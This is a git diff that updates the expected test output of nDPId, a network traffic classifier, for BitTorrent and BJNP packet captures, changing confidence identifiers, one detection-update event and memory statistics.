00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":299,"packets-processed":299,"total-skipped-flows":0,"total-l4-payload-len":285982,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":24,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":24,"total-idle-flows":24,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":134,"global_ts_msec":1455469982106} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 299/299 @@ -140,9 +140,9 @@ ~~ total active/idle flows...: 24/24 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6209710 bytes -~~ total memory freed........: 6209710 bytes -~~ total allocations/frees...: 118529/118529 +~~ total memory allocated....: 6343344 bytes +~~ total memory freed........: 6343344 bytes +~~ total allocations/frees...: 121291/121291 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1461 chars diff --git a/test/results/bittorrent_utp.pcap.out b/test/results/bittorrent_utp.pcap.out index 569eae723..278889c90 100644 --- a/test/results/bittorrent_utp.pcap.out +++ b/test/results/bittorrent_utp.pcap.out 
@@ -2,12 +2,11 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1456385034843} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1456385034843,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1456385034843,"pkt":"xCwDBkn+LFbcjDU0CABFCACEN6IAAHARjPNS83ErwKgBBf3Jn\/8AcJbNZDE6YWQyOmlkMjA69\/YAfOoTUG5RTefsvJTyrlFxFfg5OmluZm9faGFzaDIwOvf2AdimJ292LCw98nSvKCf40fHeZTE6cTk6Z2V0X3BlZXJzMTp0MjoOYTE6djQ6TFQBATE6eTE6cWU="} 
-00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} +00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} 
00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1456385039236,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1456385039236,"pkt":"xCwDBkn+LFbcjDU0CABFCACEPR1AAHARR3hS83ErwKgBBf3Jn\/8AcOi+ZDE6YWQyOmlkMjA69\/YAfOoTUG5RTefsvJTyrlFxFfg5OmluZm9faGFzaDIwOvf2AbAuK1Rd0f1URppB\/xHRD5bKZTE6cTk6Z2V0X3BlZXJzMTp0MjoZ4TE6djQ6TFQBATE6eTE6cWU="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1456385040274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1456385040274,"pkt":"xCwDBkn+LFbcjDU0CABFCAAwPfxAAHARRu1S83ErwKgBBf3Jn\/8AHJxJQQBTAhDusvAAAAAAAAAAAOf1AAA="} -00834{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1456385034843,"flow_last_seen":1456385041276,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":15014,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1456385041276,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}} 
-00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1456385034843,"flow_last_seen":1456385054059,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":37877,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":1456385054059,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","packets-captured":86,"packets-processed":86,"total-skipped-flows":0,"total-l4-payload-len":37877,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1456385054059} 
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1456385034843,"flow_last_seen":1456385054059,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":37877,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":1456385054059,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","packets-captured":86,"packets-processed":86,"total-skipped-flows":0,"total-l4-payload-len":37877,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1456385054059} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 86/86 ~~ skipped flows.............: 0 
@@ -16,10 +15,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6134097 bytes -~~ total memory freed........: 6134097 bytes -~~ total allocations/frees...: 118202/118202 +~~ total memory allocated....: 6267731 bytes +~~ total memory freed........: 6267731 bytes +~~ total allocations/frees...: 120964/120964 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 470 chars ~~ json string max len.......: 844 chars -~~ json string avg len.......: 653 chars +~~ json string avg len.......: 649 chars diff --git a/test/results/bjnp.pcap.out b/test/results/bjnp.pcap.out index 515b98b42..0f3a93da0 100644 --- a/test/results/bjnp.pcap.out +++ b/test/results/bjnp.pcap.out 
@@ -2,44 +2,44 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1467725378685} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467725378685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725378685,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1467725383705,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383705,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1467725383909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383909,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1467725384113,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384113,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1467725384313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384313,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1467725384517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384517,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1467725384721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384721,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} 